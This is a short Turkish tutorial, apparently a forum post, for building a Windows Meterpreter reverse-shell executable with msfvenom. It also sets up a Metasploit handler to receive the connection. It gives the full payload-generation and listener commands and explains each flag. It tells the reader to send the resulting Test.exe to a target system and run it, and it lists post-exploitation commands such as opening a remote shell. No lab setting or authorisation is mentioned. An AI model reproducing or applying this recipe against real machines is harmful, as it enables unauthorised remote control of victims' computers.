Bu süreç, Metasploit Framework kullanarak hedef bir Windows makinede Meterpreter reverse shell kurulumunu içerir. Meterpreter, Metasploit’in sunduğu güçlü bir ters bağlantı (reverse connection) yükü (payload) olup, uzaktan sistem üzerinde tam kontrol sağlar.
OLUŞTURMA
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP Address of Host Machine] LPORT=444 -o /home/attacker/Desktop/Test.exe
-p windows/meterpreter/reverse_tcp: Bu, Windows için Meterpreter reverse TCP yükünü kullanır.
--platform windows: Hedef sistemin Windows olduğunu belirtir.
-a x86: 32-bit mimarisi için yük oluşturur. Eğer hedef sistem 64-bit ise -a x64 kullanılabilir.
-f exe: Çıktıyı .exe formatında oluşturur.
LHOST=[IP Address of Host Machine]: Kendi dinleme IP adresinizi buraya yerleştirin. Hedef sistem bu IP adresine bağlantı yapacaktır.
LPORT=444: Dinleme portunu belirler. Yük, bu port üzerinden ters bağlantı kurar.
-o /home/attacker/Desktop/Test.exe: Oluşturulan yükün kaydedileceği dosya yolu.
BAĞLANTI
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 444
exploit
set payload windows/meterpreter/reverse_tcp: Yük türünü ayarlar.
set LHOST 192.168.1.100: Kendi IP adresinizi ayarlar.
set LPORT 444: Dinleme portunu ayarlar.
exploit: Handler’ı başlatır ve bağlantıyı dinlemeye başlar.
ÇALIŞTIR
Oluşturulan Test.exe dosyasını hedef sisteme gönderin ve çalıştırın. Hedef sistemden reverse TCP bağlantısı kurulduğunda, Metasploit handler’ı bu bağlantıyı kabul eder ve Meterpreter oturumu başlatır.
Sonuç:
Başarılı Bağlantı: Hedef sistemden bağlantı sağlandığında, Meterpreter komut satırı ile uzaktan yönetim ve çeşitli komutlar çalıştırma yeteneğine sahip olursunuz.
Örnek Komutlar:
sysinfo: Hedef sistem hakkında bilgi verir.
getuid: Oturum açan kullanıcının kimliğini gösterir.
shell: Hedef sistemde bir komut satırı açar.
Elinize sağlık hocam.